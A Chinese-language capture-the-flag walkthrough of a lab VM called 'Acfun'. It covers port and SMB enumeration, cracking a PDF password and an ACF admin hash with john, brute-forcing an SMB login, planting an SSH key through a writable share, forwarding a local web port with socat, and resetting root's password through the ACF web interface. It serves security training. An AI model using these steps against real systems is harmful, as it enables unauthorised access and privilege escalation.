Acfun

信息搜集

192.168.100.62

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# rustscan -a 192.168.100.62 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.62:22
Open 192.168.100.62:139
Open 192.168.100.62:445
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.62
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-29 19:43 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
Initiating ARP Ping Scan at 19:43
Scanning 192.168.100.62 [1 port]
Completed ARP Ping Scan at 19:43, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:43
Completed Parallel DNS resolution of 1 host. at 19:43, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 19:43
Scanning 192.168.100.62 [3 ports]
Discovered open port 445/tcp on 192.168.100.62
Discovered open port 22/tcp on 192.168.100.62
Discovered open port 139/tcp on 192.168.100.62
Completed SYN Stealth Scan at 19:43, 0.02s elapsed (3 total ports)
Initiating Service scan at 19:43
Scanning 3 services on 192.168.100.62
Completed Service scan at 19:43, 11.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.100.62
NSE: Script scanning 192.168.100.62.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.38s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
Nmap scan report for 192.168.100.62
Host is up, received arp-response (0.00052s latency).
Scanned at 2026-04-29 19:43:26 CST for 13s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.21.9 (workgroup: WORKGROUP)
MAC Address: 08:00:27:17:D8:D3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=4/29%OT=22%CT=%CU=35967%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69F1EEEB%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=106%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 6.822 days (since Wed Apr 22 23:59:57 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ACFUN

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.21.9)
| Computer name: localhost
| NetBIOS computer name: ACFUN\x00
| Domain name:
| FQDN: localhost
|_ System time: 2026-04-29T19:43:40+08:00
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-time:
| date: 2026-04-29T11:43:40
|_ start_date: N/A
| nbstat: NetBIOS name: ACFUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ACFUN<00> Flags: <unique><active>
| ACFUN<03> Flags: <unique><active>
| ACFUN<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 11007/tcp): CLEAN (Couldn't connect)
| Check 2 (port 60974/tcp): CLEAN (Couldn't connect)
| Check 3 (port 57031/udp): CLEAN (Failed to receive data)
| Check 4 (port 17608/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.100.62

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

  • 22 SSH
  • 139 SMB
  • 445 SMB

139 端口(老式 SMB)

  • 走的是:NetBIOS → SMB

  • 需要先进行:

    • NetBIOS 名称解析
    • Session 建立
  • 类似:
    “先打电话问你是谁,再传文件”

特点:

  • 依赖 NetBIOS(UDP 137/138 + TCP 139)
  • 在老 Windows(XP / 2003)常见
  • 现代系统基本是兼容保留

445 端口(现代 SMB)

  • 走的是:直接 SMB over TCP
  • 不需要 NetBIOS

类似:
“直接用IP连接你,开始传文件”

特点:

  • Windows 2000 以后主流
  • 更高效
  • 攻击面更集中

SMB枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# enum4linux-ng -A 192.168.100.62
ENUM4LINUX - next generation (v1.3.10)

==========================
| Target Information |
==========================
[*] Target ........... 192.168.100.62
[*] Username ......... ''
[*] Random Username .. 'eirkself'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)

=======================================
| Listener Scan on 192.168.100.62 |
=======================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

=============================================================
| NetBIOS Names and Workgroup/Domain for 192.168.100.62 |
=============================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- ACFUN <00> - B <ACTIVE> Workstation Service
- ACFUN <03> - B <ACTIVE> Messenger Service
- ACFUN <20> - B <ACTIVE> File Server Service
- WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
- WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
- MAC Address = 00-00-00-00-00-00

===========================================
| SMB Dialect Check on 192.168.100.62 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false

=============================================================
| Domain Information via SMB session for 192.168.100.62 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ACFUN
NetBIOS domain name: ''
DNS domain: ''
FQDN: localhost
Derived membership: workgroup member
Derived domain: unknown

===========================================
| RPC Session Check on 192.168.100.62 |
===========================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'eirkself' and password ''
[H] Rerunning enumeration with user 'eirkself' might give more results

=====================================================
| Domain Information via RPC for 192.168.100.62 |
=====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

=================================================
| OS Information via RPC for 192.168.100.62 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.21.9)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.21.9
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT Samba Server

=======================================
| Users via RPC on 192.168.100.62 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 1 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 user(s) via 'enumdomusers'
[+] After merging user results we have 1 user(s) total:
'1000':
username: leaf
name: ''
acb: '0x00000010'
description: ''

========================================
| Groups via RPC on 192.168.100.62 |
========================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

========================================
| Shares via RPC on 192.168.100.62 |
========================================
[*] Enumerating shares
[+] Found 2 share(s):
IPC$:
comment: IPC Service (Samba Server)
type: IPC
public:
comment: ''
type: Disk
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share public
[+] Mapping: OK, Listing: OK

===========================================
| Policies via RPC for 192.168.100.62 |
===========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: None
Minimum password length: 5
Minimum password age: none
Maximum password age: 49710 days (136 years) 6 hours 21 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: 49710 days (136 years) 6 hours 21 minutes

===========================================
| Printers via RPC for 192.168.100.62 |
===========================================
[+] No printers returned (this is not an error)

Completed after 0.98 seconds
  • 允许匿名 + guest 登录

  • 共享里有 public 和 leaf

  • 枚举到了用户 leaf(最小密码长度仅为 5没有锁定阈值)

查看匿名共享

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# smbclient //192.168.100.62/public -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 26 16:04:33 2026
.. D 0 Sun Apr 26 16:04:33 2026
ACF_Framework_Internal_Guide.pdf N 3020 Sun Apr 26 16:04:25 2026

9468048 blocks of size 1024. 708304 blocks available
smb: \> get ACF_Framework_Internal_Guide.pdf
getting file \ACF_Framework_Internal_Guide.pdf of size 3020 as ACF_Framework_Internal_Guide.pdf (589.8 KiloBytes/sec) (average 589.8 KiloBytes/sec)
smb: \>

image

需要密码使用johb爆破

1
2
3
4
5
6
7
8
9
10
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# pdf2john ACF_Framework_Internal_Guide.pdf > pdf_hash.txt
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pdf_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567890 (ACF_Framework_Internal_Guide.pdf)

image

pdf中有一点隐写

image

复制出来是

To initialize the framework for our internal acfun.dsz services, run the following commands as root:

  • 技术栈: 目标运行在 Alpine Linux 上,管理界面是基于 Lua 语言和 haserl (CGI 包装器) 构建的。
  • 服务路径: 既然安装了 acf-core​,系统上通常会运行一个 Web 服务(通常是 lighttpd​ 或 nginx)来托管 ACF 界面。(这里的web服务肯定是只监听 localhost的,因为前面并没有扫描出web服务且隐写部分还给出了域名)
  • 特权操作: 文档第 3 点明确指出,初始化和管理需要 root 权限。这意味着 ACF 相关的脚本或二进制文件在执行时可能具有高权限。
  • 潜在风险点: haserl​ 是一个经常出现安全漏洞的组件,如果配置不当(例如脚本编写存在漏洞),可能导致 ​远程代码执行 (RCE)

爆破leaf

1
netexec smb 192.168.100.62 -u leaf -p /usr/share/wordlists/rockyou.txt --local-auth --ignore-pw-decoding

加–local-auth是因为默认情况下,工具会按“域环境”去认证但是前面的枚举smb的时候是非域环境

image

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# smbclient //192.168.100.62/leaf -U leaf%gothic
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 26 15:53:08 2026
.. D 0 Sun Apr 26 15:53:08 2026
.ssh DH 0 Sun Apr 26 16:10:23 2026

9468048 blocks of size 1024. 707068 blocks available
smb: \> cd .ssh\
smb: \.ssh\> ls
. D 0 Sun Apr 26 16:10:23 2026
.. D 0 Sun Apr 26 15:53:08 2026
id_ed25519.pub N 92 Sun Apr 26 16:09:15 2026
id_ed25519 N 399 Sun Apr 26 16:09:15 2026

9468048 blocks of size 1024. 707068 blocks available
smb: \.ssh\> put authorized_keys
putting file authorized_keys as \.ssh\authorized_keys (15.0 kB/s) (average 15.0 kB/s)
smb: \.ssh\> ls
. D 0 Wed Apr 29 20:32:29 2026
.. D 0 Sun Apr 26 15:53:08 2026
id_ed25519.pub N 92 Sun Apr 26 16:09:15 2026
authorized_keys A 92 Wed Apr 29 20:32:29 2026
id_ed25519 N 399 Sun Apr 26 16:09:15 2026

9468048 blocks of size 1024. 707064 blocks available
smb: \.ssh\>

登录到leaf共享后有个.ssh文件夹这里我直接上传了我的公钥

ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# ssh leaf@192.168.100.62 -i ~/.ssh/id_ed25519
The authenticity of host '192.168.100.62 (192.168.100.62)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.62' (ED25519) to the list of known hosts.
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

leaf@Acfun:~$ id
uid=1000(leaf) gid=1000(leaf) groups=1000(leaf)
leaf@Acfun:~$

提权

leaf -> xueli

横向移动到xueli,leaf和xueli公用一套密钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
leaf@Acfun:/tmp$ ssh xueli@127.0.0.1 -i /home/leaf/.ssh/id_ed25519
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

xueli@Acfun:~$ id
uid=1001(xueli) gid=1001(xueli) groups=1001(xueli)
xueli@Acfun:~$

xueli -> root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
xueli@Acfun:~$ ss -utnl
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 192.168.101.255:137 0.0.0.0:*
udp UNCONN 0 0 192.168.100.62:137 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:137 0.0.0.0:*
udp UNCONN 0 0 192.168.101.255:138 0.0.0.0:*
udp UNCONN 0 0 192.168.100.62:138 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:138 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:8443 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 1024 127.0.0.1:443 0.0.0.0:*
tcp LISTEN 0 50 [::]:445 [::]:*
tcp LISTEN 0 50 [::]:139 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
xueli@Acfun:~$

有一个443的web服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
xueli@Acfun:~$ ps -ef
PID USER TIME COMMAND
1 root 0:00 /sbin/init
2 root 0:00 [kthreadd]
3 root 0:00 [pool_workqueue_]
4 root 0:00 [kworker/R-kvfre]
5 root 0:00 [kworker/R-rcu_g]
6 root 0:00 [kworker/R-sync_]
7 root 0:00 [kworker/R-slub_]
8 root 0:00 [kworker/R-netns]
10 root 0:00 [kworker/0:1-mm_]
11 root 0:00 [kworker/0:0H-ev]
12 root 0:00 [kworker/u8:0-ev]
13 root 0:00 [kworker/u8:1-ip]
14 root 0:00 [kworker/R-mm_pe]
15 root 0:00 [rcu_tasks_kthre]
16 root 0:00 [rcu_tasks_rude_]
17 root 0:00 [rcu_tasks_trace]
18 root 0:01 [ksoftirqd/0]
19 root 0:00 [rcu_preempt]
20 root 0:00 [rcu_exp_par_gp_]
21 root 0:00 [rcu_exp_gp_kthr]
22 root 0:00 [migration/0]
23 root 0:00 [idle_inject/0]
24 root 0:00 [cpuhp/0]
25 root 0:00 [cpuhp/1]
26 root 0:00 [idle_inject/1]
27 root 0:00 [migration/1]
28 root 0:19 [ksoftirqd/1]
33 root 0:00 [kdevtmpfs]
34 root 0:00 [kworker/R-inet_]
35 root 0:00 [kauditd]
36 root 0:00 [oom_reaper]
37 root 0:00 [kworker/u10:1-e]
38 root 0:00 [kworker/R-write]
39 root 0:00 [kcompactd0]
41 root 0:00 [ksmd]
42 root 0:00 [khugepaged]
43 root 0:00 [kworker/R-kinte]
44 root 0:00 [kworker/R-kbloc]
45 root 0:00 [kworker/R-blkcg]
46 root 0:00 [irq/9-acpi]
47 root 0:00 [kworker/1:1-eve]
48 root 0:00 [kworker/R-md]
49 root 0:00 [kworker/R-md_bi]
50 root 0:00 [kworker/R-edac-]
51 root 0:00 [kworker/R-devfr]
52 root 0:00 [watchdogd]
53 root 0:00 [kworker/R-quota]
54 root 0:00 [kworker/1:1H-kb]
55 root 0:00 [kswapd0]
56 root 0:00 [kworker/u9:1-ev]
74 root 0:00 [kworker/R-kthro]
125 root 0:00 [kworker/u9:2-ev]
191 root 0:00 [kworker/R-mld]
204 root 0:00 [kworker/R-ipv6_]
209 root 0:07 [kworker/1:2-eve]
212 root 0:00 [kworker/u10:4-k]
220 root 0:00 [kworker/R-kstrp]
480 root 0:00 [kworker/u11:0]
481 root 0:00 [kworker/u12:0]
482 root 0:00 [kworker/u13:0]
483 root 0:00 [kworker/0:1H-kb]
874 root 0:00 [kworker/R-ata_s]
883 root 0:00 [scsi_eh_0]
884 root 0:00 [kworker/R-scsi_]
922 root 0:00 [kworker/R-mpt_p]
923 root 0:00 [kworker/R-mpt/0]
924 root 0:00 [scsi_eh_1]
925 root 0:00 [kworker/R-scsi_]
959 root 0:00 [kworker/u9:3-ev]
1213 root 0:00 [kworker/1:2H-kb]
1217 root 0:00 [jbd2/sda3-8]
1218 root 0:00 [kworker/R-ext4-]
1570 root 0:00 [kworker/R-crypt]
1636 root 0:00 [kworker/R-ttm]
1866 root 0:00 [jbd2/sda1-8]
1867 root 0:00 [kworker/R-ext4-]
2086 root 0:00 /sbin/udhcpc -b -R -p /var/run/udhcpc.eth0.pid -i eth0 -x hostname:Acfun
2186 root 0:00 /sbin/syslogd -t -n
2213 root 0:00 /sbin/acpid -f
2239 root 0:00 /usr/sbin/crond -c /etc/crontabs -f
2273 nobody 0:13 /usr/sbin/mini_httpd -i /run/mini_httpd/mini_httpd.pid -C /etc/mini_httpd/mini_httpd.conf
2298 ntp 0:00 /usr/sbin/ntpd -N -p pool.ntp.org -n
2326 root 0:02 /usr/sbin/smbd -D
2332 root 0:00 {smbd-notifyd} /usr/sbin/smbd -D
2333 root 0:00 {smbd-cleanupd} /usr/sbin/smbd -D
2334 root 0:00 /usr/sbin/nmbd -D
2364 root 0:00 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
2403 root 0:00 /sbin/getty -I \033c 38400 tty1
2404 root 0:00 /sbin/getty 38400 tty2
2408 root 0:00 /sbin/getty 38400 tty3
2412 root 0:00 /sbin/getty 38400 tty4
2416 root 0:00 /sbin/getty 38400 tty5
2420 root 0:00 /sbin/getty 38400 tty6
4973 root 0:00 sshd-session: leaf [priv]
4975 leaf 0:00 sshd-session: leaf@pts/0
4976 leaf 0:00 -bash
4986 root 0:00 [kworker/0:0-eve]
4995 root 0:00 [kworker/u10:0-e]
5079 leaf 0:13 ./socat TCP-LISTEN:8443,fork TCP:127.0.0.1:443
10498 root 0:00 sshd-session: leaf [priv]
10550 leaf 0:00 sshd-session: leaf@pts/1
10574 leaf 0:00 -bash
20018 leaf 0:00 ssh xueli@127.0.0.1 -i /home/leaf/.ssh/id_ed25519
20019 root 0:00 sshd-session: xueli [priv]
20056 xueli 0:00 sshd-session: xueli@pts/3
20057 xueli 0:00 -bash
22547 xueli 0:00 ps -ef
32607 root 0:00 sshd-session: leaf [priv]
32609 leaf 0:02 sshd-session: leaf@pts/2
32610 leaf 0:00 -bash
xueli@Acfun:~$

可以看到运行着一个配置文件/etc/mini_httpd/mini_httpd.conf

1
2
3
4
5
6
7
8
9
xueli@Acfun:~$ cat /etc/mini_httpd/mini_httpd.conf
nochroot
dir=/usr/share/acf/www
user=nobody
cgipat=cgi-bin**
certfile=/etc/ssl/mini_httpd/server.pem
port=443
ssl
host=127.0.0.1
  • Web 根目录: /usr/share/acf/www
  • CGI 匹配: cgipat=cgi-bin**
  • 监听地址: 127.0.0.1 (这也就是为什么前面rustscan扫描不出web服务的原因)
  • 监听端口: 443

转发443端口到本地主机

1
2
3
4
5
6
7
8
xueli@Acfun:~$ wget http://192.168.100.21/socat
Connecting to 192.168.100.21 (192.168.100.21:80)
saving to 'socat'
socat 100% |****************************************************************************************************| 4724k 0:00:00 ETA
'socat' saved
xuelif@Acfun:~$ chmod +x socat
xueli@Acfun:~$ ./socat TCP-LISTEN:8443,fork TCP:127.0.0.1:443 &
[1] 5079

这是一个ACF提供的一个类似 Webmin 的轻量级 Webmin

上传linpeas.sh扫描

image

可以看到一个acf的passwd

1
2
3
xueli@Acfun:~$ cat /etc/acf/passwd
root:$5$rDkGkMAvv6FPpwRG$.gS5I9LcOiZDYGW598cgXDPEDvHI7GLl.UmVxgdyUQ0:Admin account:ADMIN
xueli@Acfun:~$

尝试爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# vim hash.txt
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# cat hash.txt
root:$5$rDkGkMAvv6FPpwRG$.gS5I9LcOiZDYGW598cgXDPEDvHI7GLl.UmVxgdyUQ0
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
juggernaut (root)
1g 0:00:00:01 DONE (2026-04-29 22:06) 0.7462g/s 55020p/s 55020c/s 55020C/s silvi..compu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

登录web(不登录root是因为ACF的用户密码与系统用户密码相互独立)

image

成功登录进去

没看到直接利用的功能分析源码

1. ACF 用户管理密码修改 (app/acf-util/)

这个功能用于管理 ACF 系统内部的用户账户:

控制器 (password-controller.lua):

  • editme - 用户修改自己的密码和设置
  • edituser - 管理员修改任意用户的密码和设置

模型 (password-model.lua:124-159):

  • update_user 函数处理密码更新
  • 密码验证规则:最少4个字符,不能全是数字
  • 修改时密码留空表示不修改密码

2. Linux 系统密码修改 (app/alpine-baselayout/)

控制器 ( password-controller.lua:6-8 ):

1
2
3
4
5
function mymodule.edit(self)
    return self.handle_form(self, self.model.read_password, self.model.
    update_password, self.clientdata, "Save", "Set System Password", 
    "Password Set")
end

模型 ( password-model.lua:72-128 ):
这个 update_password 函数是真正修改 Linux 系统密码的核心功能:

主要步骤:

  1. 读取 /etc/shadow 文件 - 获取系统密码哈希

  2. 验证用户名 - 检查用户是否存在

  3. 验证密码强度 :

    • 最少 8 个字符,最多 128 个字符
    • 必须包含大写字母、小写字母和数字
  4. 生成随机盐值 - 使用 /dev/urandom 生成 16 字节随机盐

  5. 密码加密 - 使用 SHA-512 哈希算法( $6$ 前缀)

  6. 更新 /etc/shadow - 替换用户的密码哈希

  7. 备份机制 - 更新前自动创建 /etc/shadow.bak 备份

现在知道了利用点还需要分析路由是怎么分配的

根据 ACF 框架的路由规则:

部分 说明
prefix /alpine-baselayout/ 应用前缀,对应目录 app/alpine-baselayout/
controller password 控制器名称,对应文件 password-controller.lua
action edit 控制器中的函数,对应 mymodule.edit

所以路由是/cgi-bin/acf/alpine-baselayout/password/edit

image

我使用的密码是rootroot

image